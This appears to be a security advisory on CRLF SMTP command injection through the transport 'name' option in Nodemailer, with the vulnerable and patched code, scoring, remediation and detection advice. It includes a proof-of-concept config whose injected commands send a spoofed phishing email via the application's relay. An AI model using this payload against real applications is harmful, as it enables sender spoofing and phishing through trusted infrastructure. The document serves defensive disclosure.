GHSA-VVJJ-XCJG-GR5G: SMTP Command Injection via CRLF in Nodemailer

Nodemailer is a widely deployed Node.js module used for sending emails. Versions 8.0.4 and earlier contain a vulnerability in the handling of the transport name configuration option. This option identifies the client to the SMTP server during the initial handshake phase.

The vulnerability is classified as CWE-93, Improper Neutralization of CRLF Sequences. An attacker who controls the name parameter can inject arbitrary SMTP commands into the connection stream. The vulnerability manifests during the ESMTP and SMTP connection phases.

The impact relies on the application exposing the SMTP transport configuration to untrusted input. Once exploited, the vulnerability allows the attacker to silently prepend raw protocol commands to the application's legitimate SMTP session.

The root cause resides in the lib/smtp-connection/index.js file. During connection initialization, the library assigns the name property directly from the user-provided configuration object or a default hostname helper. The library does not strip or sanitize carriage return and line feed (CRLF) characters from this value.

When establishing the session, the library constructs handshake commands by concatenating the command verb with the unsanitized name property. The _sendCommand internal method appends a terminating CRLF sequence and writes the buffer to the socket. Because the application logic does not neutralize internal CRLF sequences, the SMTP server processes the injected line breaks as command delimiters.

The unsanitized parameter propagates into the EHLO, HELO, and LHLO commands. Handshakes often repeat after a STARTTLS secure connection is established, making this parameter a persistent injection vector throughout the session lifecycle.

The vulnerability is evident in the assignment logic for the connection identifier. The vulnerable implementation reads the name property without prior validation or sanitization.

// Vulnerable Implementation (lib/smtp-connection/index.js)
this.name = this.options.name || this._getHostname();

The patch introduced in commit 0a43876801a420ca528f492eaa01bfc421cc306e mitigates this issue by enforcing a strict sanitization step. The developers utilized a regular expression to strip all carriage return and line feed characters during assignment.

// Patched Implementation (lib/smtp-connection/index.js)
this.name = (this.options.name || this._getHostname()).toString().replace(/[\r\n]+/g, '');

This fix ensures that regardless of the input provided to the transport configuration, the resulting name property remains a single logical string. The SMTP protocol relies strictly on CRLF sequences for command termination. Stripping these characters entirely removes the vector for command injection, neutralizing the threat.

Exploitation requires the attacker to control the name property within the SMTP transport configuration. This prerequisite restricts the attack surface primarily to multi-tenant SaaS platforms, administrative panels, or environments where configuration variables are dynamically populated from untrusted sources. Once the configuration is controlled, the attacker crafts a payload containing malicious SMTP commands separated by \r\n sequences.

const transport = nodemailer.createTransport({
    host: 'smtp.target-server.com',
    port: 25,
    secure: false,
    name: 'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n'
        + 'RCPT TO:<victim@target.com>\r\nDATA\r\n'
        + 'From: ceo@company.com\r\nTo: victim@target.com\r\n'
        + 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET'
});

When the application attempts to send an email, the injected sequence executes before the legitimate payload. The EHLO command is effectively terminated early, and the subsequent MAIL FROM, RCPT TO, and DATA commands are processed by the receiving server. The attacker concludes their payload with the RSET command or a similar terminator to discard the application's appended legitimate commands.

The primary impact of this vulnerability is unauthorized email transmission and sender spoofing. By injecting raw SMTP commands, an attacker bypasses the application's intended restrictions on recipient addresses and message content. The attacker leverages the legitimate application's authorized SMTP relay to distribute malicious content.

This attack mechanism allows the threat actor to bypass domain reputation checks, Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) protections associated with the relay. The receiving servers interpret the emails as originating from the compromised application's infrastructure.

The CVSS v3.1 score for this vulnerability is 4.9. The score reflects a Moderate severity due to the high privileges required (PR:H) to influence the application's internal SMTP configuration. The confidentiality and availability metrics remain unaffected (C:N, A:N), while the integrity impact is high (I:H) due to the complete control over the emitted network stream.

The vulnerability is fully resolved in Nodemailer version 8.0.5. Organizations utilizing Nodemailer must upgrade their dependencies to this version or later to ensure the name parameter is correctly sanitized. No configuration changes are required to activate the patch.

If immediate patching is not feasible, developers must implement strict input validation on any user-supplied data used in the SMTP transport configuration. The validation logic must reject any string containing carriage return (\x0d) or line feed (\x0a) characters. The application should enforce a strict allowlist of characters for the hostname parameter, limited to alphanumeric characters, hyphens, and periods.

Security teams should monitor outbound SMTP traffic for unusual patterns. Multiple command sequences transmitted in a single packet during the EHLO or HELO phases serve as an indicator of attempted command injection. WAF and network inspection tools can alert on consecutive SMTP commands found inside initial handshake sequences.